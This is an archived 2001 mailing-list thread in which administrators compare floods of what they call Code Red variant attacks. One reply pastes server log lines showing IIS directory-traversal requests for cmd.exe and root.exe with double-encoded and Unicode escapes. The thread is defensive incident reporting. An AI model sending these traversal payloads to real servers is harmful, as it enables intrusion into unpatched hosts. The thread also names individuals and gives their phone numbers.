[ale] CodeRed attacks, here we go again.

Guillaume triton at madchat.org
Tue Sep 18 16:25:59 EDT 2001



Me too, exact same, but from this (mindspring) address 66.32.93.51
fot the last hits on my squid proxy.

"Brian J. Dowd" wrote:
> 
> Yes, 1475 attempts so far today on one minor server.
> -Brian J. Dowd
> 
> > Ditto here.  400 hits in 2 hours.  Looks like another Code Red Variant......
> >
> > Mike
> >
> > -----Original Message-----
> > From: Terry Lee Tucker [mailto:terry at esc1.com]
> > Sent: Tuesday, September 18, 2001 10:24 AM
> > To: SAngell at nan.net; ale at ale.org
> > Subject: Re: [ale] CodeRed attacks, here we go again.
> >
> > I'm getting hit with the following:
> >
> > 208.5.209.246 - - [18/Sep/2001:10:30:26 -0400] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> > 208.5.209.246 - - [18/Sep/2001:10:30:27 -0400] "GET
> > /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> > 208.5.209.246 - - [18/Sep/2001:10:30:28 -0400] "GET
> > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> > 208.5.209.246 - - [18/Sep/2001:10:30:30 -0400] "GET
> > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> > 208.5.209.246 - - [18/Sep/2001:10:30:31 -0400] "GET
> > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> > 208.5.209.246 - - [18/Sep/2001:10:30:36 -0400] "GET
> > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 322
> > 208.5.209.246 - - [18/Sep/2001:10:30:37 -0400] "GET
> > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 322
> > 208.5.209.246 - - [18/Sep/2001:10:30:39 -0400] "GET
> > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> > stem32/cmd.exe?/c+dir
> > HTTP/1.0"
> > 404 338
> > 208.5.209.246 - - [18/Sep/2001:10:30:40 -0400] "GET
> > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> > 208.5.209.246 - - [18/Sep/2001:10:30:41 -0400] "GET
> > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> >
> > Obviously, someone is trying to get something from a windoze box.
> >
> > SAngell at nan.net wrote:
> > >
> > > I am being flooded by Code Red attacks originating from network
> > 205.152.x.x all
> > > by the variant which is attempting to drop the trojan backdoor on to my
> > servers.
> > > either root.exe or explorer.exe. This attack is worse that any I have
> > previously
> > > seen with hundreds of attempts in the last 5 minutes.
> > >
> > > Anyone else witnessing these?
> > >
> > > \_\_\_\_\_\_\_\_\_\_\_/_/_/_/_/_/_/_/_/_/_/
> > > \_    Steve Angell,  MCSE, CCNA           _/
> > > \_    MIS Operations Manager               _/
> > > \_    TSYS Total Debt Management  _/
> > > \_    Norcross, GA                                   _/
> > > \_    Phone 770-409-5570                    _/
> > > \_    Fax      770-416-1752                   _/
> > > \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
> > >
> > > --
> > > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
> > body.
> >
> > --
> > Sparta, NC 28675 USA
> > 336.372.6812
> > http://www.esc1.com
> > The Gates of hell shall NOT prevail...
> > --
> > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message
> > body.
> > --
> > To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.

-- 
OpenPGP 0x9A3D4CA1
http://pgp.mit.edu http://www.keyserver.net

--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.





More information about the Ale mailing list